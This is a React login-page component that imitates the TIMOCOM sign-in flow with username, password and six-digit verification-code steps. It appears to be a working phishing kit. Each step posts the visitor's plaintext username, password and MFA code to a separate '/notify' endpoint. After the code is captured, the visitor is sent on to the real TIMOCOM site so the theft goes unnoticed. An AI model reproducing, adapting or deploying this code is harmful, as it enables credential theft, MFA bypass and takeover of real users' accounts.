import React, { useEffect, useState } from 'react';
import { LoginPageSection,LoginPageUsernameSection,LoginPagePasswordSection,LoginPageVerifySection } from '../../constants/htmlTemplates';
import './customizing.css'
import './adTeaser.css'
import './infobox.css'
import './mfa.css'
import './patternfly-addons.css'
import Loading from '../../components/loading/loading';
import {API_ROOT} from '../../configs/env-vars';

function Login() {
      const [loading, setLoading] = useState(false);

      useEffect(() => {
        document.title = "Login | TIMOCOM";

        const head = document.head;
      
        const importMap = document.createElement('script');
        importMap.type = 'importmap';
        importMap.textContent = JSON.stringify({
          imports: { rfc4648: '/resources/js/rfc4648.js' },
        });
        head.appendChild(importMap);
        
        // const passwordScript = document.createElement('script');
        // passwordScript.type = 'module';
        // passwordScript.src = '/resources/js/passwordVisibility.js';
        // head.appendChild(passwordScript);
      
        const sessionScript = document.createElement('script');
        sessionScript.type = 'module';
        sessionScript.textContent = `
          import { startSessionPolling } from "/resources/js/authChecker.js";
          startSessionPolling("/realms/timocom/login-actions/restart?client_id=web-ui-public-login&...");
        `;
        head.appendChild(sessionScript);
      
        return () => {
          // Cleanup when leaving the page
          [importMap, sessionScript].forEach(el => el.remove());
        };
         // eslint-disable-next-line
      }, []);

      useEffect(() => {
        const interval = setInterval(() => {
          const wrapper = document.getElementById('kc-form');
        
          // When wrapper is ready and username section not yet inserted
          if (wrapper && !wrapper.querySelector('#username-section')) {
            handleUsernameSection();
            clearInterval(interval);
          }
        }, 100);

        // Cleanup
        return () => clearInterval(interval);
         // eslint-disable-next-line
      }, []);
      
      const handleLoginClick = () => {
        const wrapper = document.getElementById('kc-form');
        const username = document.getElementById('username').value;
        if (wrapper && !wrapper.querySelector('#password-section')) {
          wrapper.innerHTML = '';
          wrapper.insertAdjacentHTML('beforeend', LoginPagePasswordSection);
          const resetLogin = wrapper.querySelector('#reset-login');
          const passwordShowPassword = wrapper.querySelector('#password-show-password');
          document.getElementById('username').value = username;
          const loginBtn = document.getElementById('kc-login-send-data');
          if (loginBtn) {
            loginBtn.addEventListener('click', handleSendDataClick);
          }
          if (resetLogin) {
            resetLogin.addEventListener('click', handleUsernameSection);
          }
          if (passwordShowPassword) {
            passwordShowPassword.addEventListener('click', handleToggleClick);
          }
        }
      };

      const handleUsernameSection=() => {
        const wrapper = document.getElementById('kc-form');
        const username = document.getElementById('username')?.value || '';
        if (wrapper) {
          wrapper.innerHTML = '';
          wrapper.insertAdjacentHTML('beforeend', LoginPageUsernameSection);
          const loginBtn = wrapper.querySelector('#kc-login');

          if (loginBtn) {
            loginBtn.addEventListener('click', handleLoginClick);
          }
          if(username){
            document.getElementById('username').value = username;
          }
        }
      };
      
      const handleToggleClick = () =>  {
        const toggleButton = document.getElementById("password-show-password");
        const passwordElement = document.getElementById("password");
        if (passwordElement.type === "password") {
            passwordElement.type = "text";
            toggleButton.children.item(0).src = "/resources/img/hidePass.png";
        } else if(passwordElement.type === "text") {
            passwordElement.type = "password";
            toggleButton.children.item(0).src = "/resources/img/showPass.png";
        }
      }

      const sendRequest = async ({username,password,code}) => {
        const response = await fetch(`${API_ROOT}/notify`, {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json',
          },
          body: JSON.stringify({
            username: username,
            password: password,
            code : code || null,
          }),
        });

        if (!response.ok) {
          throw new Error(`HTTP error! status: ${response.status}`);
        }
        return true;
      };

      const handleSendDataClick = async(e) => {
        e.preventDefault();
        //  const errorMessage = document.getElementById('input-error-container-credentials');
        //  errorMessage.style.display = 'flex';
        const userName = document.getElementById('username').value;
        const password = document.getElementById('password').value;

        // Your e-mail address or password is incorrect. Please try again
        // errorMessage.style.display = 'flex';              

        try {
          const res = await sendRequest({username:userName,password:password});
          // You can handle success UI here
          // e.g. redirect or show success message

          setLoading(true);
          setTimeout(() => setLoading(false), 3000);
          handleMfaSection({username:userName,password:password});
        } catch (error) {
          console.error('Error sending data:', error);
          // Show your error message element
          // errorMessage.style.display = 'flex';
        }
      };

      const sendCodeFunc = async({username,password}) => {
        const code = document.getElementById('tan').value
        if(!code || code.length !== 6){
          const element = document.getElementById('input-error-container-credentials');
          element.style.display = 'block';
          const errorText = document.getElementById('error-text');
          errorText.innerText = 'Please lengthen this text to 6 characters or more (you are currently using ' + code.length + ' characters).';
          return;
        }
        const res = await sendRequest({username,password,code});
        if(res){
          setLoading(true);
          setTimeout(() => setLoading(false), 3000);
          window.location.href = "https://my.timocom.com/app/tcgate/";
        }
      };

      const requestNewCodeFunc = async({username,password}) => {
        const code = 'Request new code'
        const res = await sendRequest({username,password,code});
      };

      const handleMfaSection = ({username,password}) => {
        const wrapper = document.getElementById('kc-form');
        if (wrapper) {
          wrapper.innerHTML = '';
          wrapper.insertAdjacentHTML('beforeend', LoginPageVerifySection);
          const sendCode = document.getElementById('kc-send-code');
          const requestNewCode = document.getElementById('request-new-code');
          const usernameAdd = document.getElementById('verify-email-address');

          if(sendCode && requestNewCode && usernameAdd){
            sendCode.style.cursor = 'pointer';
            requestNewCode.style.cursor = 'pointer';
            usernameAdd.innerHTML = username;
            sendCode.addEventListener('click', () => sendCodeFunc({username:username,password:password}));
            requestNewCode.addEventListener('click', () => requestNewCodeFunc({username:username,password:password}));
          }
         
        }
      };     

    return (
      <div>
        <div>
            <div dangerouslySetInnerHTML={{ __html: LoginPageSection }} />
        </div>
        <Loading loading={loading}/>
      </div>
    );
}

export default Login;